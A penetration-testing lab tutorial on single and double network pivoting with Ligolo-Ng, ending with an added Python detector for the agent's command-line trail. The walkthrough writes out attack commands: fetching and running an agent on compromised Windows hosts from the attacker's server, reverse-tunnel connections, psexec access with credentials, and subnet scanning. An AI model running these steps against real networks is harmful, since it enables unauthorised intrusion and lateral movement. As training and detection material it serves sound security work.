Contents
Ligolo-Ng Overview
Ligolo V/S Chisel
Lab Setup
Prerequisites
Setting up Ligolo-Ng
Single Pivoting
Double Pivoting
Ligolo-Ng Overview:
Ligolo-Ng is a lightweight and efficient tool that lets penetration testers establish tunnels over
reverse TCP/TLS connections using a tun interface. Noteworthy features include being written in Go,
VPN-like behavior, a customizable proxy, and agents written in Go. The tool supports multiple
protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS resolution, offering
connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool
residue on disk or in memory.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Ligolo V/S Chisel:
• Ligolo-Ng outperforms Chisel in terms of speed and customization options.
• Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections
with each target.
• Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
• Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which
operates primarily on HTTP using a websocket.
Lab Setup
Follow the step-by-step guide for lateral movement within a network, covering both single and double
pivoting techniques.
Prerequisites
Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file for Linux 64-bit.
Install the 'agent' file on the target machine and the 'proxy' file on the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step 1: After obtaining both the agent and proxy files, the next step is to set up Ligolo-Ng. Use the
'ifconfig' command to check the current state of the Ligolo-Ng configuration. To activate the
interface, execute the following commands:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify Ligolo-Ng activation with the 'ifconfig' command.
Step2: Unzip the Ligolo proxy file:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
This proxy file establishes the connection through Ligolo that the subsequent pivoting actions rely
on. To explore the full range of options available in the proxy file, use the 'help' option:
./proxy -h
Step 3: The options displayed in the preceding image are designed for incorporating various types of
certificates with the proxy. The chosen approach involves utilizing the '-selfcert' option, which
operates on port 11601. Execute the provided command, as illustrated in the accompanying image
below:
./proxy -selfcert
Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking
machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file
using the command:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To facilitate the transmission of this agent file to the target, establish a server with the command:
updog -p 80
Step 5: In the context of lateral movement, a session has been successfully acquired through netcat.
Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file
onto the target system. Referencing the image below, execute the provided sequence of commands:
cd Desktop
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is
presently operational on Kali, the subsequent action involves executing the agent file.
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the
'session' command, opting for '1' to access the active session. Following the session establishment,
execute the 'ifconfig' command as illustrated in the provided image.
Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address
192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this
internal network in the subsequent steps.
Single Pivoting
In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of
Network A.
A direct ping to Network B fails, as illustrated in the image below, because of the different
network configuration.
To progress towards the single pivoting objective, open a new terminal window. Add the internal
subnet to the IP route list and confirm the addition, as illustrated in the image below, using the
following commands:
ip route add 192.168.148.0/24 dev ligolo
ip route list
Return to the Ligolo proxy session window and initiate the tunneling process by entering the 'start'
command, as demonstrated in the provided image.
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B
subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.
Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the
previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as
illustrated in the image below.
Double Pivoting
In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing
Network B as an intermediary.
From the newly opened terminal window, use the Impacket tool to access the identified Windows 10
host with the IP 192.168.148.132. Then execute the following commands to download the Ligolo agent
onto Windows 10:
impacket-psexec administrator:123@192.168.148.132
cd c:\users\public
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established,
given that our Ligolo proxy file is already operational.
agent.exe -connect 192.168.1.5:11601 -ignore-cert
On the Ligolo-Ng proxy server, a new session corresponding to Windows 10 will be present, as
indicated in the accompanying image. Execute the 'start' command to initiate additional tunneling.
Execute the 'session' command to display the list of sessions. Navigate through the sessions using
arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest
session, identified as session 2. Select this session and utilize the 'ifconfig' command to inspect the
interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24,
mirroring the details depicted in the image below.
Upon identifying the new network, the initial step involves attempting a ping. However, the image
below indicates an absence of connectivity between Kali and the network C.
Add the Network C subnet to the IP route list with the following commands:
ip route add 192.168.159.0/24 dev ligolo
ip route list
With the modification of our IP route, the next step involves the addition of a listener to traverse the
intra-network and retrieve the session. To incorporate the listener, utilize the following command:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The image above confirms the activation of the listener. To initiate tunneling, refer to the available
options using the help command. It becomes evident that the ongoing tunneling in session 1 must be
halted before starting the process in session 2. This step-by-step approach facilitates the transfer
of data to the listener, which subsequently retrieves the necessary information. This operational
technique, known as double pivoting, involves stopping the initial tunneling in the first session
using the 'stop' command. In the second session, execute the 'start' command, following the steps
illustrated in the image below.
Double pivoting was successful, which was verified using crackmapexec with the command:
crackmapexec smb 192.168.159.0/24
Metasploitable2 was then discovered within the network. With the acquired network access, a ping and
an nmap scan could be conducted, as illustrated in the image below.
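For defenders, the agent download and launch steps in this guide leave a recognizable command-line trail. The following added example (not part of the original guide or the Ligolo-Ng project) scans process-creation records for the flags and default port shown on this page; the record fields (host, cwd, command_line), the list of user-writable paths and the sample events are assumptions constructed for illustration.

```python
import re

# Indicators taken from the commands shown on this page.
CONNECT_RE = re.compile(r"-connect\s+(?P<host>[\w.\-]+):(?P<port>\d{1,5})", re.I)
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|iwr)\b.*?(?P<url>\S+\.exe)\b", re.I)
USER_WRITABLE = (r"\users\public", r"\desktop", r"\appdata", r"\temp")  # assumption
DEFAULT_PROXY_PORT = 11601  # port the page's './proxy -selfcert' listens on

def analyze(event):
    """Return a list of finding strings for one process-creation event."""
    cmd = event["command_line"]
    findings = []
    m = CONNECT_RE.search(cmd)
    if m:
        findings.append(f"reverse-tunnel style -connect to {m['host']}:{m['port']}")
        if int(m["port"]) == DEFAULT_PROXY_PORT:
            findings.append("destination is the default Ligolo-Ng proxy port")
        if re.search(r"-ignore-cert\b", cmd, re.I):
            findings.append("TLS certificate validation disabled (-ignore-cert)")
    d = DOWNLOAD_RE.search(cmd)
    if d:
        findings.append(f"executable fetched from command line: {d['url']}")
    if findings and any(p in event["cwd"].lower() for p in USER_WRITABLE):
        findings.append("run from a user-writable directory")
    return findings

def correlate(events):
    """Flag hosts where an .exe download is followed by a -connect execution."""
    downloaded, alerts = set(), []
    for ev in events:  # events are assumed to be in time order
        cmd = ev["command_line"]
        if DOWNLOAD_RE.search(cmd):
            downloaded.add(ev["host"])
        elif CONNECT_RE.search(cmd) and ev["host"] in downloaded:
            alerts.append((ev["host"], analyze(ev)))
    return alerts

# Constructed sample events (simplified process-creation records, not real logs).
SAMPLE_EVENTS = [
    {"host": "SRV01", "cwd": r"C:\Users\admin\Desktop",
     "command_line": "powershell wget 192.168.1.5/agent.exe -o agent.exe"},
    {"host": "SRV01", "cwd": r"C:\Users\admin\Desktop",
     "command_line": "agent.exe -connect 192.168.1.5:11601 -ignore-cert"},
    {"host": "WS07", "cwd": r"C:\Windows\System32",
     "command_line": "ping -n 1 192.168.148.132"},
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The rules key on the command-line flags and port rather than the file name, so they apply to both the Desktop and c:\users\public launches described in the guide.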
www.ignitetechnologies.in